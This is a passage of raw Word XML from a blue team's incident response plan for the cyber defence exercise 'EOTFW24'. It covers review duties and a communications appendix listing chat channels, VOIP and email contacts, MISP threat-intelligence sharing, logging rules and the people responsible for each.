          <w:rFonts w:eastAsia="Aptos Display"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Aptos Display"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Furthermore, as requested by the White Team, all incident reporting will be conducted using the White Team template. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="687B4318" w14:textId="61FDA1DD" w:rsidR="00E745F5" w:rsidRDefault="00E73365" w:rsidP="00E745F5">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="25" w:name="_Toc163900536"/>
      <w:r>
        <w:t>Review and maintenance</w:t>
      </w:r>
      <w:bookmarkEnd w:id="25"/>
    </w:p>
    <w:p w14:paraId="1C951E4D" w14:textId="4A44BA76" w:rsidR="00E73365" w:rsidRPr="00896910" w:rsidRDefault="00896910" w:rsidP="00E73365">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Aptos Display"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Aptos Display"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">The Incident Response Plan must be reviewed annually and whenever significant changes occur on the eHarbor operating environment. The review will be conducted CISO of eHarbor. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20D51229" w14:textId="292670E8" w:rsidR="00870D5F" w:rsidRPr="001A26B4" w:rsidRDefault="00870D5F">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001A26B4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="42C64F18" w14:textId="5E3BEC9E" w:rsidR="00870D5F" w:rsidRDefault="004166B0" w:rsidP="00870D5F">
      <w:pPr>
        <w:pStyle w:val="Appendicesheading"/>
      </w:pPr>
      <w:bookmarkStart w:id="26" w:name="_Toc163900537"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Appendix D - </w:t>
      </w:r>
      <w:r w:rsidR="00870D5F">
        <w:t>Communications Plans</w:t>
      </w:r>
      <w:bookmarkEnd w:id="26"/>
    </w:p>
    <w:p w14:paraId="7BA35DC8" w14:textId="767DC5CC" w:rsidR="00816C1C" w:rsidRDefault="00816C1C" w:rsidP="00816C1C">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="27" w:name="_Toc163900538"/>
      <w:r>
        <w:t>Objective</w:t>
      </w:r>
      <w:bookmarkEnd w:id="27"/>
    </w:p>
    <w:p w14:paraId="4CC13A56" w14:textId="77777777" w:rsidR="00816C1C" w:rsidRPr="0040754D" w:rsidRDefault="00816C1C" w:rsidP="00816C1C">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0040754D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>To ensure efficient communication within Blue Team 2 (BT2), as well as effective coordination with other blue teams and the White Team, during the cyber security exercise "EOTFW24."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EF1EF6F" w14:textId="59C433A2" w:rsidR="00816C1C" w:rsidRDefault="00816C1C" w:rsidP="00816C1C">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="28" w:name="_Toc163900539"/>
      <w:r>
        <w:t>Communication channe</w:t>
      </w:r>
      <w:r w:rsidR="00F958AE">
        <w:t>l</w:t>
      </w:r>
      <w:bookmarkEnd w:id="28"/>
    </w:p>
    <w:p w14:paraId="605E31B3" w14:textId="76D68E58" w:rsidR="00F958AE" w:rsidRDefault="00F958AE" w:rsidP="00F958AE">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="29" w:name="_Toc163900540"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Rocket Chat</w:t>
      </w:r>
      <w:bookmarkEnd w:id="29"/>
    </w:p>
    <w:p w14:paraId="015344B2" w14:textId="77777777" w:rsidR="00F958AE" w:rsidRPr="0040754D" w:rsidRDefault="00F958AE" w:rsidP="00F958AE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0040754D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>BT2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>_internal channel</w:t>
      </w:r>
      <w:r w:rsidRPr="0040754D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> for fast information delivery and internal discussions within BT2.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="727F0E98" w14:textId="77777777" w:rsidR="00F958AE" w:rsidRPr="0040754D" w:rsidRDefault="00F958AE" w:rsidP="00F958AE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0040754D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">BT2_log channel for logging events </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>for white team.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F5FC453" w14:textId="77777777" w:rsidR="00F958AE" w:rsidRPr="0040754D" w:rsidRDefault="00F958AE" w:rsidP="00F958AE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0040754D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>EOTFW24 channel for receiving critical information about the exercise.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67FB60C4" w14:textId="77777777" w:rsidR="00F958AE" w:rsidRDefault="00F958AE" w:rsidP="00F958AE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0040754D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>BT_Common for inter-team communication with other blue teams.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31BC3D62" w14:textId="77777777" w:rsidR="00F958AE" w:rsidRPr="0040754D" w:rsidRDefault="00F958AE" w:rsidP="00F958AE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D8BADF3" w14:textId="77777777" w:rsidR="00F958AE" w:rsidRPr="004A04BF" w:rsidRDefault="00F958AE" w:rsidP="00F958AE">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004A04BF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Responsible Person</w:t>
      </w:r>
      <w:r w:rsidRPr="008009B3">
        <w:rPr>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>: Jari Litmanen</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="129CF27C" w14:textId="77777777" w:rsidR="00F958AE" w:rsidRDefault="00F958AE" w:rsidP="00F958AE">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0040754D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Backup: </w:t>
      </w:r>
      <w:r w:rsidRPr="004A04BF">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Jasso Laamanen, Chip Guard</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F743665" w14:textId="6AEAD8B2" w:rsidR="00F958AE" w:rsidRDefault="00F958AE" w:rsidP="00F958AE">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="30" w:name="_Toc163900541"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>VOIP Calls</w:t>
      </w:r>
      <w:bookmarkEnd w:id="30"/>
    </w:p>
    <w:p w14:paraId="1A89B715" w14:textId="77777777" w:rsidR="00F958AE" w:rsidRPr="0040754D" w:rsidRDefault="00F958AE" w:rsidP="00F958AE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0040754D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>VOIP calls for internal discussions and negotiations with other blue teams.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3041717A" w14:textId="77777777" w:rsidR="00F958AE" w:rsidRDefault="00F958AE" w:rsidP="00F958AE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0040754D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Maintain logs of VOIP calls in the BT2_log channel, including details of discussions and decisions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59AB2EC9" w14:textId="77777777" w:rsidR="00F958AE" w:rsidRPr="0040754D" w:rsidRDefault="00F958AE" w:rsidP="00F958AE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="172EAA37" w14:textId="77777777" w:rsidR="00F958AE" w:rsidRPr="0040754D" w:rsidRDefault="00F958AE" w:rsidP="00F958AE">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0040754D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Responsible Person: </w:t>
      </w:r>
      <w:r w:rsidRPr="004A04BF">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Jasso Laamanen</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7444C79C" w14:textId="77777777" w:rsidR="00F958AE" w:rsidRDefault="00F958AE" w:rsidP="00F958AE">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0040754D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Backup: </w:t>
      </w:r>
      <w:r w:rsidRPr="004A04BF">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Chip Guard</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CF26146" w14:textId="0BCF5771" w:rsidR="00F958AE" w:rsidRDefault="00F958AE" w:rsidP="00F958AE">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="31" w:name="_Toc163900542"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Email</w:t>
      </w:r>
      <w:bookmarkEnd w:id="31"/>
    </w:p>
    <w:p w14:paraId="56815CC5" w14:textId="742618F0" w:rsidR="00F958AE" w:rsidRDefault="00F958AE" w:rsidP="00F958AE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="479F9087">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Eharbor email address is Eharbor@lookout.vle.fi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BD0E542" w14:textId="77777777" w:rsidR="00F958AE" w:rsidRPr="00644359" w:rsidRDefault="00F958AE" w:rsidP="00F958AE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="5502BE70">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>For communication with the CEO of the company, start the subject field with [TO CEO].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A6CBDCF" w14:textId="4DE9F53C" w:rsidR="00F958AE" w:rsidRPr="00F958AE" w:rsidRDefault="00F958AE" w:rsidP="00F958AE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="5502BE70">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ceo</w:t>
      </w:r>
      <w:hyperlink r:id="rId31">
        <w:r w:rsidRPr="5502BE70">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>-eharbor@lookout.vle.fi</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="18BA8A97" w14:textId="77777777" w:rsidR="00F958AE" w:rsidRPr="00644359" w:rsidRDefault="00F958AE" w:rsidP="00F958AE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="5502BE70">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>CyberFence will establish the following common lookout emails for communication:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="476374E8" w14:textId="77777777" w:rsidR="00F958AE" w:rsidRPr="00644359" w:rsidRDefault="00F958AE" w:rsidP="00F958AE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="5502BE70">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SOC_eHarbor@lookout.vle.fi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D88CF02" w14:textId="77777777" w:rsidR="00F958AE" w:rsidRPr="00644359" w:rsidRDefault="00F958AE" w:rsidP="00F958AE">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="5502BE70">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Use these email addresses to communicate between CyberFence and other blue teams.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="147A5AB1" w14:textId="77777777" w:rsidR="00F958AE" w:rsidRPr="00644359" w:rsidRDefault="00F958AE" w:rsidP="00F958AE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="5502BE70">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The cyber authority will operate using the email address authority@lookout.vle.fi.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34F5FF69" w14:textId="77777777" w:rsidR="00F958AE" w:rsidRPr="00644359" w:rsidRDefault="00F958AE" w:rsidP="00F958AE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="5502BE70">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Contact the White Team using the email address eotfw@vle.lookout.fi.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C542114" w14:textId="77777777" w:rsidR="00F958AE" w:rsidRPr="0040754D" w:rsidRDefault="00F958AE" w:rsidP="00F958AE">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2285F67A" w14:textId="77777777" w:rsidR="00F958AE" w:rsidRPr="00644359" w:rsidRDefault="00F958AE" w:rsidP="00F958AE">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="5502BE70">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Responsible Person:</w:t>
      </w:r>
      <w:r w:rsidRPr="5502BE70">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Jasso Laamanen</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="084D639E" w14:textId="77777777" w:rsidR="00F958AE" w:rsidRDefault="00F958AE" w:rsidP="00F958AE">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="5502BE70">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Backup:</w:t>
      </w:r>
      <w:r w:rsidRPr="5502BE70">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Chip Guard, Jari Litmanen</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DFB872D" w14:textId="51D7CEAB" w:rsidR="00575ED2" w:rsidRDefault="00575ED2" w:rsidP="00575ED2">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="32" w:name="_Toc163900543"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>MISP</w:t>
      </w:r>
      <w:bookmarkEnd w:id="32"/>
    </w:p>
    <w:p w14:paraId="5BD1F55D" w14:textId="77777777" w:rsidR="00575ED2" w:rsidRPr="00644359" w:rsidRDefault="00575ED2" w:rsidP="00575ED2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00644359">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Collaborate with other blue teams and the White Team via MISP for sharing IoCs and relevant threat intelligence.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20BECFB9" w14:textId="77777777" w:rsidR="00575ED2" w:rsidRDefault="00575ED2" w:rsidP="00575ED2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00644359">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Log malicious events reported in Rocket Chat to MISP for further analysis and dissemination.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5333A500" w14:textId="77777777" w:rsidR="00575ED2" w:rsidRPr="00644359" w:rsidRDefault="00575ED2" w:rsidP="00575ED2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7F4DE50F" w14:textId="77777777" w:rsidR="00575ED2" w:rsidRDefault="00575ED2" w:rsidP="00575ED2">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="5502BE70">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Responsible Person: </w:t>
      </w:r>
      <w:r w:rsidRPr="5502BE70">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Jari Litmanen </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A597E83" w14:textId="77777777" w:rsidR="00575ED2" w:rsidRDefault="00575ED2" w:rsidP="00575ED2">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="5502BE70">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Backup: </w:t>
      </w:r>
      <w:r w:rsidRPr="5502BE70">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Jasso Laamanen</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33A93A19" w14:textId="2A58112C" w:rsidR="00BB49F1" w:rsidRDefault="00BB49F1" w:rsidP="00BB49F1">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="33" w:name="_Toc163900544"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Logging</w:t>
      </w:r>
      <w:bookmarkEnd w:id="33"/>
    </w:p>
    <w:p w14:paraId="22248671" w14:textId="77777777" w:rsidR="00BB49F1" w:rsidRPr="00644359" w:rsidRDefault="00BB49F1" w:rsidP="00BB49F1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00644359">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Maintain detailed logs of meaningful events encountered by BT2 in the BT2_log Rocket Chat channel.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E4658C4" w14:textId="77777777" w:rsidR="00BB49F1" w:rsidRPr="00644359" w:rsidRDefault="00BB49F1" w:rsidP="00BB49F1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00644359">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Logs should include timestamps, event descriptions, discovered threats, and mitigation strategies employed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BC84E7E" w14:textId="2B91809F" w:rsidR="00BB49F1" w:rsidRDefault="00BB49F1" w:rsidP="00BB49F1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00644359">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Ensure logs also cover emails, phone calls, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">social media action, </w:t>
      </w:r>
      <w:r w:rsidRPr="00644359">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>and any external interactions relevant to BT2's operations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E77F1D7" w14:textId="77777777" w:rsidR="00BB49F1" w:rsidRDefault="00BB49F1" w:rsidP="00BB49F1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A85BC8B" w14:textId="77777777" w:rsidR="00BB49F1" w:rsidRPr="00644359" w:rsidRDefault="00BB49F1" w:rsidP="00BB49F1">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="5502BE70">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Responsible Person:</w:t>
      </w:r>
      <w:r w:rsidRPr="5502BE70">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Jari Litmanen</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="479EE8A7" w14:textId="77777777" w:rsidR="00BB49F1" w:rsidRDefault="00BB49F1" w:rsidP="00BB49F1">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="5502BE70">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Backup: </w:t>
      </w:r>
      <w:r w:rsidRPr="5502BE70">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Jasso Laamanen, Chip Guard</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0558F2DE" w14:textId="6A45D8D3" w:rsidR="00BB49F1" w:rsidRDefault="00BB49F1" w:rsidP="00BB49F1">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
